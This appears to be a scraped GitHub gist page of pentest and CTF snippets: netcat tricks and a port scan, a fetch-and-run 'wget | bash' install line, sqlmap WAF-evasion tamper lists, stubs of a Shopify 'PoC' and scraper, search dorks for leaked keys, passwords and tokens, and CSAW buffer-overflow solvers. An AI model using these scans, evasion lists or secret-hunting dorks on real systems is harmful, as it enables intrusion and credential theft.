Faid Md Amine faidamine

@faidamine
faidamine / pentest cheat sheet
Created March 4, 2021 09:40 — forked from githubfoam/pentest cheat sheet
pentest cheat sheet
----------------------------------------------------------------------------------------------------
(netcat or nc or ncat)
#Use Netcat as a Simple Web Server
vi index.html #make a simple HTML file
printf 'HTTP/1.1 200 OK\n\n%s' "$(cat index.html)" | netcat -l 8888 #serve the file once on port 8888
http://server_IP:8888 #access the content; netcat serves the page once, then the connection closes
while true; do printf 'HTTP/1.1 200 OK\n\n%s' "$(cat index.html)" | netcat -l 8888; done #have netcat serve the page indefinitely by wrapping the previous command in an infinite loop
netcat -z -v domain.com 1-1000 #scan all ports up to 1000
@faidamine
faidamine / setup_bbty.sh
Created October 27, 2019 01:37 — forked from LuD1161/setup_bbty.sh
Setup Bug Bounty Tools on AWS instance / any VPS for that matter
#!/bin/bash
#
# Execute as wget -O - gist_url | bash
#
# Couldn't add gist url as, it changes after every update i.e. as soon as I save this, it's url will change :p
#
# It's debian based, so for centos and likewise you have to change apt to yum and similarly
#
InstallationStartTime=$(date +%s)
# All scripts
```
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
```
# General scripts
```
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
```
# Microsoft access
```
@faidamine
faidamine / exploit.py
Created April 25, 2019 22:59 — forked from ayoubfathi/exploit.py
PoC for shopify vulnerability
import json
import requests
import bs4 as bs
from concurrent.futures import ThreadPoolExecutor
from concurrent.futures import ProcessPoolExecutor
try:
    import requests.packages.urllib3
    requests.packages.urllib3.disable_warnings()
except Exception:
    pass
@faidamine
faidamine / shopify.py
Created April 25, 2019 22:59 — forked from ayoubfathi/shopify.py
Given a wordlist this will look for revenue data of shopify stores
import json
import requests
import bs4 as bs
from concurrent.futures import ThreadPoolExecutor
from concurrent.futures import ProcessPoolExecutor
try:
    import requests.packages.urllib3
    requests.packages.urllib3.disable_warnings()
except Exception:
    pass
@faidamine
faidamine / revip.py
Created April 25, 2019 22:58 — forked from ayoubfathi/revip.py
Using YouGetSignal API to get domains hosted on the same IP - Reverse IP
import requests
import json
import sys
import argparse
_strip = ['http://', 'https://', 'www']
G = '\033[92m'
Y = '\033[93m'
“Hackme.tld” API_key
“Hackme.tld” secret_key
“Hackme.tld” aws_key
“Hackme.tld” Password
“Hackme.tld” FTP
“Hackme.tld” login
“Hackme.tld” github_token
“Hackme.tld” http:// & https://
“Hackme.tld” amazonaws
“Hackme.tld” digitaloceanspaces
@faidamine
faidamine / curl.md
Last active September 20, 2018 21:57

Common Options

-#, --progress-bar Make curl display a simple progress bar instead of the more informational standard meter.

-b, --cookie <name=data> Supply cookie with request. If no =, then specifies the cookie file to use (see -c).

-c, --cookie-jar <file name> File to save response cookies to.

@faidamine
faidamine / algebra.py
Last active September 18, 2018 18:54
Algebra - MISC 100 - CSAW 18 Quals
#!/bin/python
#Faid Mohammed Amine
#Fb : piratuer
from pwn import *
import math
r = remote("misc.chal.csaw.io", 9002)
r.recvuntil("*"*82)
@faidamine
faidamine / bigboy.py
Created September 17, 2018 01:55
BigBoy - PWN 25 - CSAW 18
#!/bin/python
#Faid Mohammed Amine
#Fb : piratuer
from pwn import *
s = remote("pwn.chal.csaw.io",9000)
pld = "A"*20
pld += p32(0xcaf3baee)